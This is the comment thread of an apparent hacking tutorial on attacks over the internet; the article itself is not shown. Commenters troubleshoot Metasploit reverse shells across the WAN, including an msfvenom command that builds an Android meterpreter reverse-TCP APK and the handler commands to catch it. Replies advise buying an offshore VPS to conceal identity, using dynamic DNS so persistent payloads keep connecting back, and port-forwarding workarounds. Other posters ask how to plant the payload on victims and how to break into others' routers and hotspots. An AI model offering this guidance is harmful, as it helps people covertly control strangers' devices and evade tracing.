How To: Perform an Attack Over WAN (Internet)

Thanks, hyper!

Adeptly explained, one couldn't ask for more. Well done.

TRT

gj +kudos

Excellent tut, well written and thorough. +1

well written!!! excellent tut...

This is one of the best articles, Well explained...
So is it more than 80% that antiviruses on windows will detect and delete it or no ?
is there a way to hide your identity,
and how can you find the hacker if you got hacked this way ??

I'll have to admit, this would be a bit over my head, but you might want to refer to this article. It talks about using wireshark to detect meterpreter reverse https backdoors, but I'm thinking that reverse tcp would be similar.

What about hiding your identity using a vpn service like private internet access for ex? Would that not work in this situation? Thx.

awesome! Perfect article. Thank you :)

very good article code. +1

great tutorial :D

How do i find the victims local ip addres. (over wan of course)

It's not possible until after you've established the meterpreter session. For this attack you don't need to know it, but if want to anyways you can always drop into a shell and use the command 'ipconifig' once you have a session.

One last thing can u take a look on this real quick:

(It says my port forwarding is timed out)

screenshoot of my settings: http://scr.hu/8l45/md8vq

Timed out: http://scr.hu/8l45/ceqfc

-Maybe I should change the "protocol", what do u think went wrong?

If you take a look at the comments under this post, you will find my explanation to your current issue.

TRT

But if it is one of these options which is causing the problem:
• Local firewall
• Antivirus firewall
• Router firewall
• Router forwarding rules
• ISP

-How can i first of all find which of the above it is, and avoid it?
Also, what do u think it is?

Out of those options, I think local firewall is the most common. You can test them by disabling your windows firewall, disabling your antivirus, etc. Although, just to be sure, you started the listener before you checked to see if the port was open, correct?

I created new rule in Firewall so it cant be firewall now, no antivirus , not even firewall of router, tried DMZ also and now I end up with consideration as it might be my ISP.

;-;
ANY SOLUTIONS FOR ME ...!!!!!!
IT LOOKS LIKE I'm DONE WITH LIFE. :(
PLEASE HELP......PLEASE

My router Does'nt support Port Forwarding What can i do now ?

You might want to look for a portmapper. I don't know much about these, but I saw one that appeared in a couple forums called upnp portmapper. I've never used it, so I'm not sure if it will work for you or not, but it might be worth a try.

If you can find a setting that allows SSH or Telnet connections to your router, you can enable port forwarding manually by editing its filesystem and making minor adjustments.

TRT

how would you go about doing that?

Very well written article I look forward to more articles from you.

hey Code a very good article , but can i ask how to mask the ip so it cant be traced back?

Purchase an offshore VPS and set it to redirect traffic to your machine. Primarily focus on the country of origin, this is critical in concealing your identity.

TRT

Perfect! Well written!

Thanks for the good article ..but in my case im lost ! in my case im using expressvpn connection , and im confused witch IP address I should use to preform an attack over the WAN ?

Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.25.32.53 128.0.0.0 UG 0 0 0 tun0
0.0.0.0 192.168.8.1 0.0.0.0 UG 100 0 0 eth0
10.25.0.1 10.25.32.53 255.255.255.255 UGH 0 0 0 tun0
10.25.32.53 0.0.0.0 255.255.255.255 UH 0 0 0 tun0
128.0.0.0 10.25.32.53 128.0.0.0 UG 0 0 0 tun0
174.128.229.169 192.168.8.1 255.255.255.255 UGH 0 0 0 eth0
192.168.8.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0

any Idea on witch IP address I should use as an "LHOST " for my payload and for my listener ? My target is over the WAN ...not LAN .

Thanks

Hi, i am having a very weird problem i set up my payload with msfvenom here is my output:msfvenom -p android/meterpreter/reversetcp LHOST=Public Ip LPORT=4444 R > /root/Desktop/android.apki tried also reverse https and http.I went to my router settings to configure port forwarding :

screen shot of my router:
http://postimg.org/image/i3mp5xfo1/than i went to msfconsole--> use exploit/multi/handler
set payload android/meterpreter/reversetcp
set LHOST 192.168.10.104 (lan ip of the mashine) i also tried with Public ip it change to 0.0.0.0
set LPORT 4444 i'v tired also other ports like 443, 80, 7777.

exploit . (nothing happend)than i checked my ports if thay are open in : https://www.grc.com/x/ne.dll?rh1dkyd2 the status of my port 4444 was stealth so that means not open.. !! i also checked another web page http://www.canyouseeme.org/ and i got this error: Error: I could not see your service on 46.xx.xx.xxx on port (4444)Reason: Connection timed out.I am very confused why is this happening ?!

I called my ISP-s and they said they are not blocking ports i tried that from 2 diffrent ISP-s from my apartmant and home.. because im using my home pc

and my apartmant laptop for wan pentesting.Btw LAN worked perfectly the problem is only in WAN.Please tell me if i did anything wrong, and if i didnt please tell me were the problem is!

Thank you to all.

i have the same problem have you figured it out already ??? if so please let me know

Hey bro u need a static IP for making tcp connection over wan network

Its all good, but the Public IP Address changes almost everyday, os if we send a payload to someone and even make it persistent, what are we supposed to do so that payload connects back to our machine, even though our IP address has changed :/

Is there any method of overcoming this problem???

If your public IP address is constantly changing, you can set up a DNS server that redirects connections to your address. Use the address of the DNS server in your payload; you'll have to update the DNS server every time your public IP address changes, but you won't have to change the payload. I'd recommend starting at FreeDNS.org

The Victim can easily see the attacker's IP on their PC using TCP VIEWER.
Hence can we use a Proxy IP as our LHOST in the Payload instead of our Public IP ?

If yes than how to do it.

i have port forwarded the 4444 port and no success http://prntscr.com/d0p79z
youcanseeme says http://prntscr.com/d0p7hc
and msfconsole says http://prntscr.com/d0p7l6
i have tried with veil evasion and msfvenom no success what shud i do ????

Yeah, it doesn't look like there's anything wrong with the configuration of your router. If the listener is running on your attacker machine while you check canyouseeme.org, then it should say the port is open, but there must be some other reason it is not visible. If I were you, I would try it using different ports, or even try different services (e.g. Apache) to find out what works. Good luck.

I know this is going to sound like a really basic question but bare with me. Does your machine still have the IP in the port forwarding rule? Since it may have got a different IP from DHCP?

well its a very clear crisp article.must say you a good teacher.wish i can get some help on port forwarding in vm using NAT with a usb external router of tp link.tried several methods and tutorials but couldn,t confirm if its done.IIf i may know how to confirm whether my ports are forwarded in vm??

Thanks for this article, I think we are a lot of people trying to learn more about penetration testing and I just wanna say it is highly valued and appreciated. Im using PIA vpn usally. Which would make port forwarding unnecessary in my case, correct? But how should the options then be set for fx. backdoor as well as listenener? What IPs go where in order to establish a connect via WAN. And in order to make this connection persistant wouldn't it demand a static ip address? Thanks in advance.

/M

sir

my isp block all my ports...if I do port forwarding in my router i'ts not working because of isp blocking......I have 3 laptop connect to my router...ex = 192.168.0.102, 192.168.0.104, 192.168.0.103..i can't connect to any of this laptop outside from my network...do you know ssh tunneling or some thing like that to preform this attack

i can't open ports? all ports are closed

i have a problem that i am using Access Point
it's complicated .. so many nodes and can't get into the configuration or settings
any solutions ??
this is my fb : https://www.facebook.com/ZOM61e

Here is my problem:

I configured my router to forward the port. I have ufw installed and also configured it but still whenever I go to canyouseeme it says Connection Timed out (which annoys me alot!)

Skinpain,

Disable ufw and try to run this command:

sudo python -m SimpleHTTPServer 4444

P.S. : Make sure port 4444 isn't used:

netstat -vantu | grep :4444

If it's not, you'll see no output. Otherwise you'll need to kill what's using it (e.g. I2P uses this port for proxying).

I'm totally confused. What's the 'it's' you're talking about when you say "if it's not"?

You say to connect to simplehttpserver using port 4444, then you say we shouldn't see output, and that if we did we need to kill what's using it. Isn't simplehttpserver using it???

....Or did you mean "if the port's not open" ?

Hey guys,

I'm trying to resolve a problem since 2 days without success. I can't get the "sending stage" over wan. Here what i am doing :

Setting the payload with my public ip as LHOST 4444 as LPORT.

Then in metasploit
multi/handler
LHOST local ip
LPORT 4444
exploit

and it stay on the "starting the payload handler", my port is well forwarded : success on canyouseeme when starting a listener same with the nc -lvp 4444 in terminal.

I'm like really stuck so i can't continue my learning progression, i searched everywhere and couldn't find solution so that's why i'm asking here.

Would be really nice if you guys can send me the solution or give me a lead about what i have to do :D

Edit : I'm able to do this in lan without problem. I tried the " ReverseListenerBindAddress local ip " still doesn't work, but i don't find anything about this command so ..

is the port 4444 already being used by a different service? Try using port 44443 or something. Also try different payloads is my my thought.

Hey that's a very good article, but i had a problem i don't have a router, i use mobile hotspot as my internet connection, how to do it?????

Please help??????

The hotspot has an ip, no?

But i am using wifi addepter for internet sevice in kali and can't find the gateway ip of it plz help .for port fowrading in kali while usind wifi addepter for internet,with my mobile hotspot.

with my mobile hotspot

your mobile has an internal ip address just like any other devise that connects to the internet. I would google how to port forward on a mobile phone. I'm thinking the hot spot has the same ip as your phone.

i did as u said . but im using my college LAN now how can i perform port forwarding ??
plzz reply...

I am getting this error :/ at the end ;_;
openssl::ssl::sslerror ssl_connect syscall returned=5 errno=0 state=sslv2/v3 read server hello a

Question:

My host pc runs through a vpn. In virtualbox, I run kali. My network is connected by ntp. Is this article possible with my setup ? Should I bridge the connection ? Maybe assign my wireless stick to the VM itself . . .Furthermore, my IP should be protected this way(vpn) correct ?

Level of experience: Noob.
Programming: moderate
Networking: sub-par
Thanks anyone for your help !

hello warm hackers hope you guys doin well alright today i gotta ask u a question does anybody know how to access the specific remote router for example let say this is 350.199.000.255 the public IP of a remote router and you want to get access of this so what would be the way to do this how'll u do that i come across through the whole internet but i didn't find the relevant answer looking forward for positive response and thankx in advance: )

and if its possible inbox me this is my fb https://web.facebook.com/waleed.ahsan.12177

Yes man thanks first,,,for accepting my account setup,,,and I appreciate this web it's superb man I'll say it's the best one I've come across,,,and also the article is great,what I wanna ask is I've come across most of wi-fi hotspots in my area ,,mostly some are just from people phones meaning hotspotss and a few public ones and have passwords remember so I wanted help coz unfortunately I don't possess a router too..

These are the hotspots please help

Great write up!

I would like to know if this is possible by using the targets router, instead of my own?
Specifically with EvilOSX.
I would like to be able to connect back to the target machine (MacBook) from any public WiFi, or internet connection.

Can the port forwarding settings be configured to the targets router, and reach MY public IP from any network? I'm not sure how to go about this, through port 443, or 80, 8080?

Thanks for all of the informative articles, I'm a daily visitor on your site!

Thanks for a great article. One question that I have is how does the exe file land on the victims PC? How is that accomplished? Thanks.

Hey when I'm using my routers local ip, it does not open a login page or anything . It says unable to connect internet:-( but I can surf internet:'(